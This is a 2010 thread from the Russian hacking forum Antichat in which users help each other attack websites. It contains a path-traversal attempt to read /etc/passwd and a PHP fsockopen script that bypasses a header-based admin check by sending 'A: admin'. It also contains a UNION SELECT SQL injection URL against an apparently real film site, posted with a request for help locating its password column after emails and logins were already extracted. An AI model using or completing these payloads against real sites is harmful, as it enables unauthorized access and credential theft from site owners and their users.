ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.04.2010, 17:35
|
|
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547
Репутация:
93
|
|
Сообщение от Ins3t
Ну я показал пример самого способа ( хот и не очень удачный, так как не учел условия для выхода за пределы каталога ).
не пашет такое
site.ru/modules.php?name=../../../../../../../etc/passwd//////////////////[..4095..]
.................что можно провести еще? 
|
|
|
14.04.2010, 22:55
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
[Feldmarschall],
нет конечно.
Эти программы для тупых и для ленивых! Мне не нужно, чтобы за меня делали мою работу. Мне нужен материал, с каким нужно работать.
|
|
|
|
14.04.2010, 22:56
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 14
Провел на форуме:
92038
Репутация:
10
|
|
Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}
Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,
|
|
|
|
14.04.2010, 22:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Zilt0
Всем привет,
есть в общем скрипт авторизации,
исходник примерно такой:
if( @$_SERVER['HTTP_A'] != 'admin') {header("Location: notauth.php");exit;}
Что мне надо сделать чтобы в суперглобальном массиве $_SERVER['HTTP_A'] было значение 'admin', или как мне пройти авторизацию?
буду очень благодарен за любые подсказки,
послать заголовок A=admin
Последний раз редактировалось попугай; 14.04.2010 в 23:04..
|
|
|
|
14.04.2010, 23:12
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 14
Провел на форуме:
92038
Репутация:
10
|
|
Сообщение от попугай
послать заголовок A=admin
решено,
спасибо огромное!!!
Последний раз редактировалось Zilt0; 14.04.2010 в 23:14..
|
|
|
|
14.04.2010, 23:14
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Zilt0
с помощью Acunetix Web Vulnerability - Http editor, добавляю заголовок HTTP_A, но авторизация не проходит,
может я не то делаю?
надо не HTTP_A, а A.
вот на php пример
PHP код:
echo get('www.entropy.ch', '/software/MacOSX/php/test.php', 'http://google.com/', 'firefox', '');
function get($hostname, $path, $ref, $ua, $cook)
{
$line="";
$fp=fsockopen($hostname, 80, $errno, $errstr, 60);
if(!$fp) echo $errstr($errno);
else
{
$headers = "GET $path HTTP/1.1\r\n";
$headers .="Host: $hostname\r\n";
$headers .="User-Agent: $ua\r\n";
$headers .= "Accept-Language: en,en-US;q=0.9,en;q=0.8\r\n";
$headers .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$headers .="Cookie: $cook\r\n";
$headers .="A: admin\r\n";
$headers .="Connection: Close\r\n";
$headers .="Referer: $ref\r\n\r\n";
fwrite($fp, $headers);
while(!feof($fp)){
$line .= fgets($fp, 1024);
}
fclose($fp);
}
return $line;
}
|
|
|
|
14.04.2010, 23:06
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
Redwood
скинь сюда название, полное
|
|
|
|
14.04.2010, 23:09
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от jecka3000
Redwood
скинь сюда название, полное
SQLi/XSS/LFI/RFI Exploit Scanner
|
|
|
|
14.04.2010, 23:14
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Просто "A"
|
|
|
|
14.04.2010, 23:14
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
http://www.kino.ru/forum.php?id=-2274+union+select+1,2,3--
помогите найти столбец паролей. Нашел мыла, логины, пароли найти не могу.
Версия: 4
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
